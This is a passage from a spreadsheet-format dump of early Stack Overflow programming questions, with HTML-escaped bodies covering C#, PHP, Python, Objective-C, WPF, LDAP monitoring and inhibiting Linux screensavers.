&lt;p&gt;The problem I have is that the Html elements are being stripped out.  I was hoping for something like InnerHtml to use instead of Value, but that doesn't seem to be there.&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
&lt;p&gt;Thanks all in advance,&lt;/p&gt;
&lt;p&gt;Dave&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Needed: Wrappable Counter where &lt; and &gt; do "the right thing", language C</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need the code to a couter that is allowed to overflow and where &amp;lt; &gt; continue to tell earlier values from later values, for some defined interval. &lt;/p&gt;
&lt;p&gt;To clarify, one possible implementation would be:&lt;/p&gt;
&lt;p&gt;Consider two such counters &lt;code&gt;cur&lt;/code&gt; and &lt;code&gt;dut&lt;/code&gt; (device under test), consider two functions:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;bool isEarlier(cur, dut)    // Is dut earlier than cur?
bool isLater(cur, dut)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;cur&lt;/code&gt; and &lt;code&gt;dut&lt;/code&gt; are 16 bit, &lt;code&gt;cur&lt;/code&gt; has just overflowed, its current value is, lets say &lt;code&gt;5&lt;/code&gt;. Depending on the value of &lt;code&gt;dut&lt;/code&gt;, the functions would return &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;0 to 16384: isEarlier -&gt; &lt;code&gt;(cur &amp;lt; dut)&lt;/code&gt;, isLater -&gt; &lt;code&gt;(cur &amp;gt; dut)&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;16384 to 32768: isEarlier -&gt; false, isLater -&gt; true &lt;/li&gt;
&lt;li&gt;32768 to 49152: invalid, log error&lt;/li&gt;
&lt;li&gt;49152 to 65536: isEarlier -&gt; true, isLater -&gt; false&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;:
I can write the code myself, no problem. I'm just lazy. I know for fact that there is something like that in PostgreSQL (transaction ids wrap), I just couldn't locate the function that actually does it. I am pretty sure there is something like that in the Linux kernel, probably a macro. But neighther google codesearch, nor grep over /usr/include/linux could turn it up. Any ideas where it is?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;: Clarified role of cur and dut. The "invalid" is there as a safeguard. As the differences between cur and dut become bigger, the function eventually complains.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ICallBackEventHandler does not update controls with form values</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to use ICallBackEventHandler however when I use it to call back to the server I find that my form control objects don't have the latest form values. Is there a way to force populate the values with the form data?&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Intercepting Method Access on the Host Program of IronPython</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Greetings,&lt;/p&gt;
&lt;p&gt;Most of the information I see around concerning the construction of Proxies for objects assume that there exists a Type somewhere which defines the members to be proxied. My problem is: I can't have any such type.&lt;/p&gt;
&lt;p&gt;To make the problem simpler, what I have is a dictionary that maps strings to objects. I also have getters and setters to deal with this dictionary.&lt;/p&gt;
&lt;p&gt;My goal then is to provide transparent access inside IronPython to this getters and setters as if they were real properties of a class. For example, the following code in a python script:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;x.result = x.input * x.percentage;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;...would actually represent something like in the host language:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;x.SetProperty("result", x.GetProperty("input") * x.GetProperty("percentage"));
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Also, 'x' here is given by the host program. Any ideas? Please remember that I cannot afford the creation of a typed stub... Ideally, I would be happy if somehow I could intercept every call to an attribute/method of a specific object in the script language onto the host program.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a better layout language than HTML for printing?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using Python and Qt 4.4 and I have to print some pages. Initially I thought I'd use HTML with CSS to produce those pages. But HTML has some limitations.&lt;/p&gt;
&lt;p&gt;Now the question is: is there anything that's better than HTML but just (or almost) as easy to use? Additionally, it should be GPL-compatible.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;kdgregory &amp;amp; Mark G:&lt;/em&gt; The most obvious limitation is that I can't specify the printer margins. There is another problem: How do I add page numbers?&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Jeremy French:&lt;/em&gt; One thing I have to print is a list of all the products someone ordered which can spread over a few pages.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to implement 'Excel like column sizing' for an HTML table?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to allow the user to resize columns in an HTML table, using the same method as you would in Excel.  Drag the space between columns and size.&lt;/p&gt;
&lt;p&gt;I did some research on this last year, and found a few hacks and kludges.  Most were pretty bad, and I didn't find anything really good.  Now, it looks like I need to implement this functionality, and want to do it right, so before I start this again, I just thought I'd ask if anybody else has done this, and how they did it.&lt;/p&gt;
&lt;p&gt;I believe I've seen a FogBugz demo video where they had this implemented.  So I know it can be done well.&lt;/p&gt;
&lt;p&gt;BTW-I'd prefer not to use any open source frameworks, since my client may sell this app in the future.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>XmlDocument dropping encoded characters</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My C# application loads XML documents using the following code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;XmlDocument doc = new XmlDocument();
doc.Load(path);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Some of these documents contain encoded characters, for example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;xsl:text&amp;gt;&amp;amp;#10;&amp;lt;/xsl:text&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I notice that when these documents are loaded, &lt;code&gt;&amp;amp;#10;&lt;/code&gt; gets dropped.&lt;/p&gt;
&lt;p&gt;My question: How can I preserve &lt;code&gt;&amp;lt;xsl:text&amp;gt;&amp;amp;#10;&amp;lt;/xsl:text&amp;gt;&lt;/code&gt;?&lt;/p&gt;
&lt;p&gt;FYI - The XML declaration used for these documents:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version="1.0" encoding="UTF-8"?&amp;gt;
&amp;lt;xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Standard way to embed version into python package?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a standard way to associate version string with a python package in such way that I could do the following?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import foo
print foo.version
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I would imagine there's some way to retrieve that data without any extra hardcoding, since minor/major strings are specified in &lt;code&gt;setup.py&lt;/code&gt; already. Alternative solution that I found was to have &lt;code&gt;import __version__&lt;/code&gt; in my &lt;code&gt;foo/__init__.py&lt;/code&gt; and then have &lt;code&gt;__version__.py&lt;/code&gt; generated by &lt;code&gt;setup.py&lt;/code&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to get proxy definitions from within an activeX</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Ok, so here is the scenario:&lt;/p&gt;
&lt;p&gt;I have an activeX that uploads files using HttpWebRequest class. My problem is that I have to specify the network credentials in order to get the activeX to work properly behind a proxy server.&lt;/p&gt;
&lt;p&gt;Here is the code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;HttpWebRequest req = (HttpWebRequest)WebRequest.Create(m_url);
req.Proxy = new WebProxy("http://myProxyServer:8080");
req.Proxy.Credentials = new NetworkCredential("user", "password", "domain");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How can i get this information from iExplorer with no (or minimal) user interface?&lt;/p&gt;
&lt;p&gt;Thank You :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can IntelliJ create hyperlinks to the source code from log4j output?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In the IntelliJ console, stack traces automatically contain hyperlinks that bring you to the relevant source files.  The links appear at the end of each line in the format (Log4jLoggerTest.java:25).  I can configure log4j to output text in a similar format.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;log4j.appender.Console.layout.ConversionPattern=%d{ABSOLUTE} (%F:%L) - %m%n
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In eclipse, the console automatically turned text like this into links.  In IntelliJ, the stack traces are links but my own output in the same form remains un-linked.  Is there any way to get IntelliJ to do the same?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Free software for Windows installers: NSIS vs. WiX?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm need to choose a software package for installing software. NSIS and WiX seem promising. Which one would you recommend over the other and why?&lt;/p&gt;
&lt;p&gt;Feel free to offer something else if you think it's better than these two.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I assign keyboard shortcut to the Microsoft Intellitype keyboard?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Anyone know if I can assign a keyboard shortcut such as &lt;kbd&gt;Ctrl&lt;/kbd&gt; + &lt;kbd&gt;F4&lt;/kbd&gt; (for closing the current tab in IE/Firefix etc) to the Microsoft Keyboard favourite keys 1-5.&lt;/p&gt;
&lt;p&gt;I have Microsoft Keyboard software installed and I can only browse to applications I want to run and cant seem to see anywhere else where I can assign shortcuts.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Visual Studio 2005 stopped adding code-behind files</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This morning, when I tried to add a new ASPX page to my project, Visual Studio decided that I no longer needed any .CS files associated with it. Trying to add a web control produced same results: .ascx file with no .cs. I've got two questions so far:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Considering that no changes have been made to the system over the weekend, what could be the cause of this?&lt;/li&gt;
&lt;li&gt;Is re-installing VS the only option right now?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I'm running Visual Studio 2005 SP1 on Windows XP SP3.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
&lt;p&gt;EDIT: Thank you all. The checkbox DID get unchecked at some point and I simply did not see it. I will blame this one on Monday...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Managing Wireless Network Connections with C# and the Compact Framework</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The title kinda sums it up--I need to be able to pro grammatically connect to a known access point (the SSID and credentials will be loaded during device provisioning).  I understand that both the Compact Framework SDK and the OpenNETCF SDK offer some helper methods, but I can't seem to find a good tutorial on how to use them.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Rotating flash movie clip</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to do a flash menu similar to &lt;a href="http://accuval.net" rel="nofollow"&gt;this company's&lt;/a&gt;, I have the rotation down, I just cannot figure out how to make it rotate to the top. For example, if you click "Financing" on their menu, the word financing rotates to the top. If someone could just give me the theory behind how to do that, that would be awesome.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I guess the problem I have is that I don't have any x and y position to get the difference from in order to rotate it. If that makes sense?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can .Net custom controls be used in VB6 form?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am doing some maintenance on a VB6 Windows application. I have a .Net custom control component that I would like to use on a VB6 form. Is this possible? I know how to access non-visual .Net components from VB6 by generating a COM type library for the .Net DLL, but can a .Net custom control be used like a .OCX from VB6? If so, how is the control instantiated in VB6, added to the form, etc.&lt;/p&gt;
&lt;p&gt;Thanks in advance for any replies.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Equations for 2 variable Linear Regression</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are using a programming language that does not have a linear regression function in it. We have already implemented a single variable linear equation:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;y = Ax + B&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;and have simply calculated the A and B coefficents from the data using a solution similar to &lt;a href="http://stackoverflow.com/questions/364558/find-a-best-fit-equation#364585"&gt;this Stack Overflow answer&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;I know this problem gets geometrically harder as variables are added, but for our purposes, we only need to add one more:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;z = Ax + By + C&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Does anyone have the closed form equations, or code in any language that can solve for A, B and C given an array of x, y, and z's?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Objective-C error: initializer element is not constant</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Why does the compiler give me the following error message on the provided code: "initializer element is not constant".  The corresponding C/C++ code compiles perfectly under gcc.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#import &amp;lt;Foundation/Foundation.h&amp;gt;
const float a = 1;
const float b = a + a; // &amp;lt;- error here
int main (int argc, const char * argv[]) {
    NSAutoreleasePool * pool = [[NSAutoreleasePool alloc] init];
    // insert code here...
    NSLog(@"Hello, World!");
    [pool drain];
    return 0;
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Initialize library on Assembly load</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a .net library dll that acts like a functional library. There are a bunch of static types along with static methods.&lt;/p&gt;
&lt;p&gt;There is some initialization code that I need to run to set up the library ready for use.&lt;/p&gt;
&lt;p&gt;When the assembly gets loaded is there a way to ensure that a particular method is run? Something like AppDomain.AssemblyLoad but called automatically from the assembly itself. I was thinking that maybe there is something like an AssemblyAttribute that could be used?&lt;/p&gt;
&lt;p&gt;At the moment I have this initialization code in a static constructor but as this is a library with many entry points there is no guarantee that this particular type will be used.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Call C# Web Service with using PHP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to call C# service with using PHP, anyone know how to do it? Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the difference betwen including modules and embedding modules?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;module Superpower
    # instance method
    def turn_invisible
    	...
    end
    # module method
    def Superpower.turn_into_toad
    	...
    end
    module Fly
    	def flap_wings
    		...
    	end
    end
end
Class Superman
    include Superpower
    ...
    def run_away
    	# how to call flap_wings?
    	# how to call turn_invisible?
    end
    def see_bad_guys(bad_guy = lex_luthor)
        #is this correct?
        Superpower.turn_into_toad(bad_guy)
    end
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Hi I saw some ruby code which I couldn't understand. How do you call flap_wings from within the Superman class? Is it possible to call an instance method from within the class? What is the difference between including modules and embedding modules? Why and when should you do that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I provide two default templates for a Custom Control in WPF?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Charles Petzold's "Using Templates to Customize WPF Controls" article in the Jan 2007 edition of MSDN Magazine (&lt;a href="http://msdn.microsoft.com/en-us/magazine/cc163497.aspx" rel="nofollow"&gt;http://msdn.microsoft.com/en-us/magazine/cc163497.aspx&lt;/a&gt;), he says,&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;The ProgressBar control actually has two default templates for the two orientations. (This is true of ScrollBar and Slider, as well.) If you want your new ProgressBar to support both orientations, you should write two separate templates and select them in the Triggers section of a Style element that you also define for the ProgressBar.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I am currently writing a custom control that requires this functionality, but can't work out how to do as he says - not in any way that works, anyhow.  Does anybody have a sample of this?&lt;/p&gt;
&lt;p&gt;Thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should I explicitly release?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I currently have an array of strings, I'm getting a NSString object from this array by calling the &lt;code&gt;-componentsJoinedByString:&lt;/code&gt; method. Example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;NSString *someString = [[NSString alloc] initWithString: [myStrings componentsJoinedByString:@","];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Since &lt;code&gt;-componentsJoinedByString:&lt;/code&gt; returns me an NSString, I'm assuming that it is not "owned" by me, therefore what I just did should be ok? or do I have to do this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;NSString *toDelete = [myStrings componentsJoinedByString:@","];
NSString *someString = [[NSString alloc] initWithString:toDelete];
[toDelete release];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Help with clarifying this is much appreciated!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET Membership provider with SQL schema's</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to use the ASP.NET Membership Provider security framework but would like it to use SQL Server schema's. So instead of having tables such as aspnet_Membership I would prefer it to be something like sec.Membership. Has anyone tried this and got it to work?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Work-around for PHP5's PDO rowCount MySQL issue</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've recently started work on a new project using PHP5 and want to use their PDO classes for it. The problem is that the MySQL PDO Driver doesn't support rowCount() so there's no way to run a query and then get the number of affected rows, or rows returned, which is a pretty big issue as far as I'm concerned. I was wondering if anyone else has dealt with this before and what you've done to work around it. Having to do a fetch() or fetchAll() to check if any rows were affected or returned seems like a hack to me, I'd rather just do $stmt-&gt;numRows() or something similar.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP execute stored procedure with Null</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In asp.net can use dbnull.value to send Null value to db.
How to use in ASP?&lt;/p&gt;
&lt;p&gt;Thanks a lot!!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>detecting mistyped email addresses in javascript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I notice sometimes users mistype their email address (in a contact-us form), for example, typing @yahho.com, @yhoo.com, or @yahoo.co instead of @yahoo.com&lt;/p&gt;
&lt;p&gt;I feel that this can be corrected on-the-spot with some javascript. Simply check the email address for possible mistakes, such as the ones listed above, so that if the user types his_email@yhoo.com, a non-obtrusive message can be displayed, or something like that, suggesting that he probably means @yahoo.com, and asking to double check he typed his email correctly.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The Question is:&lt;/strong&gt;&lt;br /&gt;
How can I detect -in java script- that a string is very similar to "yahoo" or "yahoo.com"? or in general, how can I detect the level of similarity between two strings?&lt;/p&gt;
&lt;p&gt;P.S. (this is a side note) In my specific case, the users are not native English speakers, and most of them are no where near fluent, the site itself is not in English.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Access 2007 integration with Sharepoint 2007 Tasks list</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;A customer of ours has an Access 2007 application with a form for creating tasks for upload to a Sharepoint Task List.  The user fills in the form (title, status, priority, start date, due date).  The user then places check marks next to the sharepoint user names that this task must be assigned to (one task per sp user selected).  This data is aggregeated into a TaskQueue table and the tasks are added to the Sharepoint list successfully (through a linked list - i think).  The problem is that we need to include zero or more attachments for each task item.  Is there a way to do this through a macro, VBA, or some other built in functionality that I haven't learned about yet?&lt;/p&gt;
&lt;p&gt;My initial idea was to use a C# windows service that monitors this taskqueue table then uses the Lists.asmx Shareopint web service and the AddAttachment method when given the List item ID and NTFS path to the attached file to add the attachments to the task list item in Sharepoint.  &lt;/p&gt;
&lt;p&gt;After playing around with Access and setting up a linked table to a Task List in Sharepoint, I found that you can add attachments through the Access 2007 datasheet view.  The problem is that you can only select one user or SP group in the Assigned TO field.  They have a lot of repetitive tasks to assign to a bunch of separate people..  That's why they developed this form.  If anyone has an idea on how to solve this issue please let me know.  Also does anyone know of any good Access 2007/Sharepoint integration resources?&lt;/p&gt;
&lt;p&gt;Thanks in advance!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a decent way to inhibit screensavers in linux?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a decent, non-lame way to inhibit xscreensaver, kscreensaver, or gnome-screensaver, whichver might be running, preferably in a screensaver-agnostic manner, and it absolutely positively must execute &lt;em&gt;fast&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;I've read the xscreensaver FAQ ( &lt;a href="http://www.jwz.org/xscreensaver/faq.html"&gt;http://www.jwz.org/xscreensaver/faq.html&lt;/a&gt; ).&lt;/p&gt;
&lt;p&gt;I have a gtk based game program that's cranking out 30 frames/second while mixing several channels of audio, and since it's controlled by a joystick, sometimes "the" screensaver will kick in.  I put "the" in quotes, because there are at least three different popular screensavers, xscreensaver, gnome-screensaver, and kscreensaver, each with their own unique and klunky methods by which an application might inhibit them.&lt;/p&gt;
&lt;p&gt;Has anybody encapsulated the code to inhibit all of these into a &lt;em&gt;fast&lt;/em&gt; chunk of code?  Oh, and it has to be GPL compatible.&lt;/p&gt;
&lt;p&gt;Currently my code simply whines piteously about the uncooperating screensaver developers if any screensaver is detected and the joystick is in use, and doesn't actually try to do anything other than advise the user to manually disable the screensaver, as the only other thing I can think to do is so incredibly ugly that I simply refuse to do it.&lt;/p&gt;
&lt;p&gt;Just wondering if anybody else has run into this, and what they've done, and if they did anything, if it was as ugly as it seems to me it would have to be, or if there's some elegant solution out there...  Seems like maybe synthesizing X events somehow to fool the screensaver into thinking there's some activity might do the trick in a universal way, but I'm really not sure how to do that (and hoping you wouldn't need to be root to do it.)&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
&lt;p&gt;Thanks,&lt;/p&gt;
&lt;p&gt;-- steve&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;Hmm, unfortuanately, at least on Fedora core 8, this does not appear to work.&lt;/p&gt;
&lt;p&gt;The xdg-screensaver script is there, and seems to be intended to work, it just doesn't actually work.&lt;/p&gt;
&lt;p&gt;Once you do "xdg-screensaver suspend window-id", where window id is gotten from within the program via &lt;/p&gt;
&lt;pre&gt;
xwindow_id = GDK_WINDOW_XWINDOW (GTK_WIDGET (widget)-&amp;gt;window);
&lt;/pre&gt;
&lt;p&gt;Or whether the window id is gotten via xprop, and xdg-screensaver run manually, two processes are created:&lt;/p&gt;
&lt;pre&gt;
[scameron@zuul wordwarvi]$ ps -efa | grep xdg
scameron  4218     1  0 20:12 pts/2    00:00:00 /bin/sh /usr/bin/xdg-screensaver suspend 0x3a00004
scameron  4223     1  0 20:12 pts/2    00:00:00 /bin/sh /usr/bin/xdg-screensaver suspend 0x3a00004
scameron  4313  3151  0 20:15 pts/1    00:00:00 grep xdg
[scameron@zuul wordwarvi]$ 
&lt;/pre&gt;
&lt;p&gt;And they never die, even after the program they are supposedly waiting for dies, and the screensaver is never re-enabled.&lt;/p&gt;
&lt;pre&gt;
[scameron@zuul wordwarvi]$ xdg-screensaver status
disabled
[scameron@zuul wordwarvi]$ ls -ltr /tmp | grep xdg
-rw------- 1 scameron scameron    15 2009-01-20 20:12 xdg-screensaver-scameron--0.0
[scameron@zuul wordwarvi]$ 
&lt;/pre&gt;
&lt;p&gt;Running xdg-screensaver resume window-id does not resume the screensaver.&lt;/p&gt;
&lt;p&gt;To re-enable the screensaver, I have to manually kill them, and manually remove the files it leaves around in /tmp:&lt;/p&gt;
&lt;pre&gt;
[scameron@zuul wordwarvi]$ kill 4218 4223
[scameron@zuul wordwarvi]$ rm /tmp/xdg-screensaver-scameron--0.0 
[scameron@zuul wordwarvi]$ xdg-screensaver status
enabled
[scameron@zuul wordwarvi]$ 
&lt;/pre&gt;
&lt;p&gt;So, good intentions, but doesn't seem to actually work.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;No, of course not expecting to run it every frame, but don't want it causing hiccups when it does run, is all.  With my thought of synthesizing X events, I was imagining it would be just often enough to make the screen saver think there was activity.&lt;/p&gt;
&lt;p&gt;Looking at xdg-screensaver (which seems to be a shell script that ultimately just does a "wait" for my process -- cool) it seems to be made to do just what I want.  I knew I couldn't be the only or first one to face this problem.  &lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
&lt;p&gt;-- steve&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Custom C# data transfer objects from javascript PageMethods</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've created a custom object that I'd like to return in JSON to a javascript method.  This object was created as a class in C#.  &lt;/p&gt;
&lt;p&gt;What's the best way to return this object from a PageMethod ([WebMethod] if you like) to a javascript onPageMethodCallback() function?  I need to be able to access the properties of this object via javascript and update the DOM according (possibly using jQuery).&lt;/p&gt;
&lt;p&gt;Thank you StackOverflow! :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Storing Queries in C# or use Stored Functions in Postgres?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Should I be storing the raw SQL queries in my c# code, or should I be delegating them to stored functions in the Postgres Backend?&lt;/p&gt;
&lt;p&gt;If I should be storing them in code, since they can get quite long, what is the optimal way to store them (ie. as constants in a separate static class)?&lt;/p&gt;
&lt;p&gt;Does using stored functions have any impact on deployability/updatability of an application?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PHP sessions for storing lots of data?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm developing a media bookmarking site and am looking for a way to remember whether a user has bookmarked an item (without having to go to the DB every page load to check).&lt;/p&gt;
&lt;p&gt;I haven't used PHP sessions before, but I'm thinking they would do the trick.&lt;/p&gt;
&lt;p&gt;Would it make sense to do an initial DB call when the user logs in, grab all the items that a user has bookmarked and save an array of all the item ids to the user session?&lt;/p&gt;
&lt;p&gt;Then when a page is loaded, for each of the 100 items on the page it would check whether that item's ID is in the session array (so we know whether to display the "bookmark" button or an indicator that they've already bookmarked it).&lt;/p&gt;
&lt;p&gt;Just want to make sure this is a right strategy, or if there is a better way. Would this work fine even if there are 10,000 ids in the array?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>serve postscript file with php script</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to give a link to a postscript file, but first I want to make a script that will monitor the downloads of this file. The link has to be 'direct' so I added &lt;code&gt;.ps&lt;/code&gt; extension to be interpreted by PHP. In the begining the script opens the text file, writes some information and then I don't know what to do.&lt;br /&gt;
Basically I have something like this (file &lt;code&gt;apendix.ps&lt;/code&gt;):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;header('Content-type: application/postscript');
header('Location: appendix.ps');
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but then, the link to this file has to have different name, so eventually I'm serving different file than in 'direct' link.&lt;br /&gt;
Is it possible to write a script &lt;code&gt;appendix.ps&lt;/code&gt; which does something in the begining and then serves real &lt;code&gt;appendix.ps&lt;/code&gt; file?&lt;br /&gt;&lt;br /&gt;
regards&lt;br /&gt;
chriss&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I find out how many connections to my slapd LDAP server?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a slapd LDAP server which is critical to my application. I want to monitor it in order to detect when it has become over-loaded or if it fails.&lt;/p&gt;
&lt;p&gt;Unfortunately we are stuck with a very old edition of slapd which has a known bug: It cannot cope with more than 64 concurrent connections. If a client attempts to open any more connections slapd blocks, causing all kinds of problems.&lt;/p&gt;
&lt;p&gt;I have been asked to make a tool which will find the number of connections open at any given moment - this might be used in an automatic monitoring tool, but how can I find out the state of slapd? Is there a way to do it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Delphi Personal Edition or Turbo Delphi- saving and searching for data</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i'm interested if it is possible to make an application like an Address Book (Windows: Start-&gt;All Programs-&gt;Accessories-&gt;Address Book) in Delphi Personal Edition or in Turbo Delphi.&lt;/p&gt;
&lt;p&gt;If yes, how to make it? Which components to use?&lt;/p&gt;
&lt;p&gt;How to make an application to be used on some other computer, and that no files would be needed to install in that computer for the application to work?
(saving data through some form and an option to search for particular entry (like Find People in Address Book))&lt;/p&gt;
&lt;p&gt;Regards&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;I was away for some time, hope we can continue,
i'll give some more information.&lt;/p&gt;
&lt;p&gt;What i'm doing is for school project, i'm trying to make an application which would actually be used by some electro-engineer.
The purpose of an application is- to easily find a map in hard-disk, in which a certain project is saved (for example, in OS Windows, C:\Projects\2009\Project1), using some query.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Skinning Google Maps To Look Like The Native Google Maps iPhone App</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I could use a goog set of eyes on my project.  I am designing a skin for the google maps API that resembles the native Google Maps App on the iPhone.  Ive already got it:&lt;/p&gt;
&lt;p&gt;1) Displaying a custom info window&lt;/p&gt;
&lt;p&gt;2) Custom pins/markers&lt;/p&gt;
&lt;p&gt;3) Pins falling from the sky on load&lt;/p&gt;
&lt;p&gt;4) Pulling data from an XML file&lt;/p&gt;
&lt;p&gt;Unfortunately I can not get it working correctly on the iPhone and I think it is because my code is improperly formatted.&lt;/p&gt;
&lt;p&gt;The map and link to the source code is available here:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.brainbackup.net/post/replicating-the-google-maps-iphone-app.html" rel="nofollow"&gt;http://www.brainbackup.net/post/replicating-the-google-maps-iphone-app.html&lt;/a&gt;&lt;/p&gt;
